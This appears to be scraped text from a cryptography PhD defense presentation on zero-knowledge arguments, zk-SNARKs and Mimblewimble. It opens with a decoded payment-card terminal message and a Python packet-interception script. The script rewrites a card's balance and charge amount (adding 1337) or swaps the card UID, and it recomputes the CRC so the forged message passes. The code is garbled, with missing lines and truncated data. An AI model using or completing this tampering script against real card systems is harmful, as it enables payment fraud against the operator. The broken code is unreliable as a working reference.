0000   02 02 00 01 4c 62 00 3b 30 34 30 37 31 39 3b 31   ....Lb.;040719;1
0010   38 31 39 33 39 3b 42 30 34 35 45 38 36 31 32 30   81939;B045E86120
0020   42 35 42 38 30 30 30 30 30 30 30 30 30 30 3b 30   B5B80000000000;0
0030   30 30 32 34 37 30 34 3b 3b 3b 3b 30 30 30 30 31   0024704;;;;00001
0040   30 30 30 3b 30 30 30 30 33 31 30 34 3b 45 3b 30   000;00003104;E;0
0050   31 42 4d 58 5f 41 54 49 47 04 dd 37               1BMX_ATIG.Ý7
date (04 July 19)
card UID
error corr. code? lol
new balance (31.04EUR)
charge amount (10.00EUR)


#!/usr/bin/env python
import codecs
import struct
import sys

import fnfqueue
from scapy.all import *

    0x0000, 0xC0C1, 0xC181, 0x0140, 0xC301, 0x03C0, 0x0280, 0xC241,
    0xC601, 0x06C0, 0x0780, 0xC741, 0x0500, 0xC5C1, 0xC481, 0x0440,
    0xCC01, 0x0CC0, 0x0D80, 0xCD41, 0x0F00, 0xCFC1, 0xCE81, 0x0E40,
    0x0A00, 0xCAC1, 0xCB81, 0x0B40, 0xC901, 0x09C0, 0x0880, 0xC841,
    0xD801, 0x18C0, 0x1980, 0xD941, 0x1B00, 0xDBC1, 0xDA81, 0x1A40,
    0x1E00, 0xDEC1, 0xDF81, 0x1F40, 0xDD01, 0x1DC0, 0x1C80, 0xDC41,
    0x1400, 0xD4C1, 0xD581, 0x1540, 0xD701, 0x17C0, 0x1680, 0xD641,
    0xD201, 0x12C0, 0x1380, 0xD341, 0x1100, 0xD1C1, 0xD081, 0x1040,
    0xF001, 0x30C0, 0x3180, 0xF141, 0x3300, 0xF3C1, 0xF281, 0x3240,
    0x3600, 0xF6C1, 0xF781, 0x3740, 0xF501, 0x35C0, 0x3480, 0xF441,
    0x3C00, 0xFCC1, 0xFD81, 0x3D40, 0xFF01, 0x3FC0, 0x3E80, 0xFE41,
    0xFA01, 0x3AC0, 0x3B80, 0xFB41, 0x3900, 0xF9C1, 0xF881, 0x3840,
    0x2800, 0xE8C1, 0xE981, 0x2940, 0xEB01, 0x2BC0, 0x2A80, 0xEA41,
    0xEE01, 0x2EC0, 0x2F80, 0xEF41, 0x2D00, 0xEDC1, 0xEC81, 0x2C40,
    0xE401, 0x24C0, 0x2580, 0xE541, 0x2700, 0xE7C1, 0xE681, 0x2640,
    0x2200, 0xE2C1, 0xE381, 0x2340, 0xE101, 0x21C0, 0x2080, 0xE041,
    0xA001, 0x60C0, 0x6180, 0xA141, 0x6300, 0xA3C1, 0xA281, 0x6240,
    0x6600, 0xA6C1, 0xA781, 0x6740, 0xA501, 0x65C0, 0x6480, 0xA441,
    0x6C00, 0xACC1, 0xAD81, 0x6D40, 0xAF01, 0x6FC0, 0x6E80, 0xAE41,
    0xAA01, 0x6AC0, 0x6B80, 0xAB41, 0x6900, 0xA9C1, 0xA881, 0x6840,
    0x7800, 0xB8C1, 0xB981, 0x7940, 0xBB01, 0x7BC0, 0x7A80, 0xBA41,
    0xBE01, 0x7EC0, 0x7F80, 0xBF41, 0x7D00, 0xBDC1, 0xBC81, 0x7C40,
    0xB401, 0x74C0, 0x7580, 0xB541, 0x7700, 0xB7C1, 0xB681, 0x7640,
    0x7200, 0xB2C1, 0xB381, 0x7340, 0xB101, 0x71C0, 0x7080, 0xB041,
    0x5000, 0x90C1, 0x9181, 0x5140, 0x9301, 0x53C0, 0x5280, 0x9241,
    0x9601, 0x56C0, 0x5780, 0x9741, 0x5500, 0x95C1, 0x9481, 0x5440,
    0x9C01, 0x5CC0, 0x5D80, 0x9D41, 0x5F00, 0x9FC1, 0x9E81, 0x5E40,
    0x5A00, 0x9AC1, 0x9B81, 0x5B40, 0x9901, 0x59C0, 0x5880, 0x9841,
    0x8801, 0x48C0, 0x4980, 0x8941, 0x4B00, 0x8BC1, 0x8A81, 0x4A40,
    0x4E00, 0x8EC1, 0x8F81, 0x4F40, 0x8D01, 0x4DC0, 0x4C80, 0x8C41,
    0x4400, 0x84C1, 0x8581, 0x4540, 0x8701, 0x47C0, 0x4680, 0x8641,
    0x8201, 0x42C0, 0x4380, 0x8341, 0x4100, 0x81C1, 0x8081, 0x4040,

def modbus_crc(payload):
    crc = 0xFFFF
    for byte in payload:
        i = ord(byte) ^ crc
        crc >>= 8
        crc ^= CRC_TABLE[i & 0xFF]

    return struct.pack('<BB', crc >> 8, crc & 0xff)

def test_crc():
    test = codecs.decode('020200014c62003b3034303731393'
                         '494704', 'hex')
    print(codecs.encode(modbus_crc(test), 'hex'))

def replace_amount(payload):
    # strip off the original crc
    payload = payload[:-2]

    values = payload.split(b';')
    charging = values[-2] == 'E'

    if not charging: return None

    balance = int(values[-3])
    charging_amount = int(values[-4])

    values[-3] = str(balance + 1337).rjust(8, '0')
    values[-4] = str(charging_amount + 1337).rjust(8, '0')

    # recompute crc
    replaced_payload = b';'.join(values)
    crc = modbus_crc(replaced_payload)

    return replaced_payload + crc

def replace_card(payload, card):
    # strip off the original crc
    payload = payload[:-2]

    # format the card
    card = card.ljust(24, b'0')

    # split the csv
    values = payload.split(b';')
    values[3] = card

    # recompute crc
    replaced_payload = b';'.join(values)
    crc = modbus_crc(replaced_payload)

    return replaced_payload + crc

def test_replace_card():
    test = codecs.decode('020200013263003b303430373'
                         '704cb59', 'hex')
    test_card = 'BA0C913A6'
    got = replace_card(test, test_card)

def info(payload):
    # remove crc
    payload = payload[:-3]
    values = payload.split(b';')

        time = '{} {}'.format(values[1], values[2])
        uid =  values[3].rstrip('0')

        if payload.endswith(b'ATIG'):
            charging = values[-2] == 'E'
            transaction_id = values[4] if charging else values[-1][:-8]

            return {
                'type': 'request',
                'charging': charging,
                'time': time,
                'transaction_id': transaction_id.strip('0'),
                'uid': uid,
            return {
                'type': 'response',
                'balance': values[-2].lstrip('0'),
                'time': time,
                'uid': uid,

    except IndexError:
        return None

def main():
    queue = 0
    conn = fnfqueue.Connection()

        q = conn.bind(0)
        q.set_mode(0xffff, fnfqueue.COPY_PACKET)
    except OSError:
        print("Access denied; Do I have root rights or the needed capabilities?")
    while True:
            for packet in conn:
                p = IP(packet.payload)
                p[Raw].load = b"ABCDEFGHILMNOPQ" # modify the packet here
                del p[TCP].chksum
                packet.payload = bytes(p)

        except fnfqueue.BufferOverflowException:
            print("buffer error")

if __name__ == '__main__':

With a belated thank you to BBQ, VIM, QWA for all the lulz ♥

Def. \(\gdef\np{\mathsf{NP}}\) \(\gdef \pt{\mathsf{PT}}\) \(\gdef\L{\mathcal{L}}\) A language \(\L \in \np\) if \(\exists \mathsf{V} \in \mathsf{PT}\):

  • (correctness) \(\forall x \in \L~~\exists w :   \mathsf{V}(x, w) = 1\)

  • (soundness)  \(\forall x \not\in \L~~\forall \hat w : ~~ \mathsf{V}(x, \hat w) = 0\)

Def. \(\gdef\np{\mathsf{NP}}\) \(\gdef \ippt{\mathsf{iPPT}}\) \(\gdef\simulator{\mathsf{S}}\)\(\gdef\L{\mathcal{L}}\) A language \(\L \in \mathsf{IP}\)  if \(\exists \mathsf{V} \in \mathsf{iPPT}\):

  • (correctness) \(\forall x \in \L~~\exists \mathsf{P} \in \mathsf{iTM} :   \Pr[\langle \mathsf{P}, \mathsf{V} \rangle(x) = 1]  = 1\)

  • (soundness)  \(\forall x \not\in \L~~\forall \mathsf{P} \in \mathsf{iTM}:  \Pr[\langle \mathsf{P},\mathsf{V} \rangle (x) = 1] \leq 1/2\)

  • (zero-knowledge)
    \(\exists \simulator \in \mathsf{PPT}~ ~\forall x \in \L~~ \forall \hat V \in \mathsf{iPPT}:   \simulator(x) \equiv \operatorname{View}_{\hat V}(\langle \mathsf{P}, \mathsf{\hat V}\rangle (x))\)


Def. \(\gdef\L{\mathcal{L}}\gdef\adv{\mathsf{A}}\gdef\simulator{\mathsf{S}}\) \((\mathsf{P}, \mathsf{V})\in \mathsf{PPT}\) is a non-interactive argument for the language \(\L\,\in\,\mathsf{NP}\) if :

  • (correctness) \(\forall x \in \L~~:   \Pr[\pi \gets \mathsf{P}(x, w) :  \mathsf{V}(x, \pi) = 1]\approx 1\)

  • (soundness)  \(\forall \adv \in \mathsf{PPT}: \Pr[(x, \pi) \gets \adv~~:~~ \mathsf{V}(x, \pi) = 1 \text { and } x\not\in\L] \approx 0\)

  • (zero-knowledge) \(\exists \simulator \in \mathsf{PPT}~ \forall x \in \L:   \simulator(x) \equiv \mathsf{P}(x, w)\)


… of knowledge?


\(\mathsf{V}(x, \pi) =1\implies \exists w \) witness

knowledge soundness:

\(\mathsf{V}(x, \pi)=1 \implies ꓘw\) witness

soundness is too weak

Sometimes soundness is not enough:

Solutions always exist, what's hard is to find them.

-- Georg Fuchsbauer

  • confidential transactions

  • anonymous credentials

Soundness is too weak

Def. (KSND) \(\gdef\adv{\mathsf{A}}\gdef\ppt{\mathsf{PPT}}\gdef\rl{\mathsf{rl}}\)

\( \forall \adv \in \ppt~~ \exists \mathsf{Ext}_\adv \in \ppt: \)

\(\Pr\left[\begin{array}{r}(x , \pi) \gets \adv\\w \gets \mathsf{Ext}_\adv\end{array}~~~:~~~ \mathsf{V}(x, \pi) = 1 ~\land~ w \not\in \mathcal{R}(x)\right] \approx 0\)

Def. (SND) \(\gdef\adv{\mathsf{A}}\gdef\ppt{\mathsf{PPT}}\)

\( \forall \adv \in \ppt: \)

\(\Pr\left[\begin{array}{r}(x , \pi) \gets \adv\end{array}: \mathsf{V}(x, \pi) = 1 ~\land~ x \not\in \mathcal{L} \right] \approx 0 \)

Which Knowledge soundness?

modelling the adversary


\(\mathsf{V}(x, \pi) =1 \implies \exists w \) witness


\(\mathsf{S}(x) \equiv \mathsf{P}(x, w)\)

do they exist?

do they exist?

Impossibility of non-interactive zero-knowledge proof system in the standard model [GO94].


knowledge soundness:

\(\mathsf{V}(x, \pi) =1 \implies ꓘ w \) witness


\(\mathsf{S}(x) \equiv \mathsf{P}(x, w)\)


Impossible to achieve

 Workarounds (that I worked on):
  • CRS model
    Lattice-based zk-SNARKs from Square Span Programs (ACM CCS'18) --
  • Relax zero-knowledge
    Non-interactive zaps of knowledge (ACNS'18) --
  • Shared randomness
    Anonymous tokens with private metadata bit (submitted) --

how goes in the crs model?


we have practical, widely deployed systems:

Zero-Knowledge Succinct Non-interactive Arguments of Knowledge!

(a.k.a zk-SNARKs)


  • arithmetization of CIRC-SAT

\(t(x) \mid w(x)\)


( \(h(x)t(x) = w(x)\) )



  • arithmetization of CIRC-SAT
  • succintness

\(s \xleftarrow{\$}\mathbb{Z}_p\) 

\(h(s)t(s) \stackrel{?}{=} w(s)\)


  • arithmetization of CIRC-SAT
  • succintness
  • oblivious polynomial evaluation

- \(\mathsf{E}(s)\) hides \(s \xleftarrow{\$}\mathbb{Z}_p\)

- \(\mathsf{E}\) is homomorphic: \(\mathsf{E}(s_0) + \mathsf{E}(s_1) = \mathsf{E}(s_0+s_1)\)

\(\implies\) given \(\mathsf{E}(s^1), \dots, \mathsf{E}(s^d)\), compute \(\mathsf{E(w(s))}\)



Developed the first designated verifier zk-SNARK from PQ assumptions.*

* Assuming q-PKE, q-PKEQ and q-PDH on LWE ciphertexts

\(\vec a \xleftarrow{\$} \mathbb{Z}_q^n,~~ e \gets \chi\)

\(\equiv \) "uniform in \(\mathbb{Z}_q^{n+1}\)"

\( \Big(\vec a, \langle \vec{\vphantom{k}{a}}, \vec k \rangle  + e\Big)\)

for \(\vec k \in \mathbb{Z}_q^n\) :

what if \(\mathsf{E}\) is lwe encryption?

Fix \(n>1\), and a modulus \(q\geq 2\), and a probability dist. \(\chi\).

\(\mathsf{E}_{\vec k}(s_0)  + \mathsf{E}_{\vec k}(s_1) = \)

key \(\vec k \xleftarrow{\$} \mathbb{Z}_q^n\)

\( = \left(\langle \vec a_0  + \vec a_1, \vec k \rangle + (e_0 + e_1) + \frac{q}{2p} (s_0 + s_1)\right)\)

\(\equiv \) "uniform in \(\mathbb{Z}_q\)"

\( + \frac{q}{2p} s \Big)\)

\( \vec a, \langle \vec{\vphantom{k}{a}}, \vec k \rangle  + e\)

\(\left( \langle \vec{\vphantom{k}{a_0}}, \vec k \rangle + e_0 +  \frac{q}{2p} s_0 \right)+ \left( \langle \vec{\vphantom{k}{a_1}}, \vec k \rangle + e_1 + \frac{q}{2p} s_1\right)\)

message \(0 \leq s < p <\!\!< q\),

Fix \(n>1\), and a modulus \(q\geq 2\), and a probability dist. \(\chi\).

\( \mathsf{E}_{\vec k}(s) :=\)

\(\vec a \xleftarrow{\$} \mathbb{Z}_q^n,~~ e \gets \chi\)


what if \(\mathsf{E}\) is lwe encryption?

  • correctness:  error growth allows the required linear operations;
  • soundness:  additional check in verification to enable the reduction;
  • zero-knowledge: flooding to avoid information leaks from the error.

what if \(\mathsf{E}\) is lwe encryption?

zero-knowldege can be relaxed

Def. (WI) \(\gdef\L{\mathcal{L}}\)

\(\forall x \in \L ~~~~~\forall w_0, w_1\in \mathcal{R}(x): \)

\(\mathsf{P}(x, w_0) \equiv \mathsf{P}(x, w_1)\)

Def. (ZK) \(\gdef\L{\mathcal{L}}\)

\(\forall x \in \L:\)

\(\mathsf{P}(x, w) \equiv \mathsf{S}(x)\)


Thm. There exists a non-interactive zap for circuit satisfiability that satisfies knowledge soundness.*

* Assuming DLin and DH-KE, or SXDH and ADH-KE.

Non-interactive zaps

A non-interactive zap is a non-interactive witness-indistinguishable proof system in the standard model.







perf WI

perf SND

Non-interactive zaps

A non-interactive zap is a non-interactive witness-indistinguishable proof system in the standard model.




\((xG, yG, xyG)\)

\((xG, yG, xyG+G)\)

\((xG, yG, zG)\)

Non-interactive zaps







\(\textsf{zap} := (\mathsf{crs}, \pi, \pi')\)

A non-interactive zap is a non-interactive witness-indistinguishable proof system in the standard model.











\(\textsf{DH}(\textsf{crs}_0, \textsf{crs}_1)\)


ZAPs of knowledge


ZAPs of knowledge

  • Groth-Ostrovsky-Sahai, with DH-KE  + some auxiliary information.
  • Groth-Sahai, using Ràfols's zap with DH-(A)KE.

An anonymous cryptocurrency whose security can be guaranteed via homomorphic commitments and arguments of knowledge.
Aggregate Cash Systems (EUROCRYPT'19) --



  • no stealing
  • no inflation
  • transaction indistinguishability
Aggregate Cash Systems (EUROCRYPT'19) --

mibmlewimble: cut-through

Matching input and outputs can be eliminated. 
(Not really possible in Bitcoin.)

















SUMMARY OF contributions

  • Non-Interactive Zaps of Knowledge,
    with G. Fuchsbauer. ACNS 2018.

  • Lattice-Based zk-SNARKs from SSPs,
    with R. Gennaro, M. Minelli, A. Niţulescu. ACM CCS 2018.

  • Aggregate cash systems: A cryptographic investigation of Mimblewimble,
    with G. Fuchsbauer, Y. Seurin. EUROCRYPT 2019.

  • Anonymous Tokens with Private Metadata Bit,
    with B. Kreuter, T. Lepoint, M. Raykova.

Additional academic


  • Homomorphic Secret Sharing: Optimizations and Applications,
    with E. Boyle, G. Couteau, N. Gilboa, Y. Ishai. ACM CCS 2017.
  • Actively Secure 1-out-of-N OT Extension with Application to Private Set Intersection,
    with E. Orsini, P. Scholl. CT-RSA 2017.



© Vernon Yuen

thanks to arma for the advice ♥


further contributions:

standards and implementations

$ apt show easy-rsa
Package: easy-rsa
Version: 3.0.6-1
Priority: optional
Section: utils
Maintainer: Michele Orrù <>
Installed-Size: 109 kB
Depends: openssl
Recommends: opensc
Download-Size: 37.9 kB
APT-Manual-Installed: no
APT-Sources: testing/main amd64 Packages
Description: Simple shell based CA utility
 This package eases the creation of certificates, for example for
 openvpn clients.
 This was formerly part of the openvpn package.


it's up to us

why it's up to us

In sector 0, block 0, the first 4 bytes store the tag's serial number (NUID) and manufacturer information. This block can only be read.

Besides using this defense as an occasion to bash at ENS' security, this thesis explores non-interactive arguments of knowledge, a cryptographic primitive that allows a prover to convince a verifier of the truth of a certain statement. We will focus on cryptographic constructions that allow a user to prove knowledge of a so-called witness that satisfies a circuit, while simultaneously hiding it.

  • 26